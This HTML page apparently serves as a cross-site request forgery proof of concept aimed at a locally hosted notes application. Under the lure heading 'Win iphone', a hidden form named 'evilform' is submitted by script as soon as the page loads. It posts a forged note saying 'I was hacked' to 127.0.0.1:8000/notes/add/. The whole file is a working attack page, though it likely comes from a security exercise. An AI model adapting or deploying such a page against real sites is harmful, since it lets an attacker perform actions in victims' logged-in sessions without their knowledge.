<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h1>Win iphone</h1>
    <form action="http://127.0.0.1:8000/notes/add/" id="evilform" method="post"  style="display: none;">
        <input type="text" name="title" value="I was hacked">
        <input type="text" name="description" value="Attacker added this description">

    </form>
    <script>
        document.getElementById('evilform').submit()
    </script>
</body>
</html>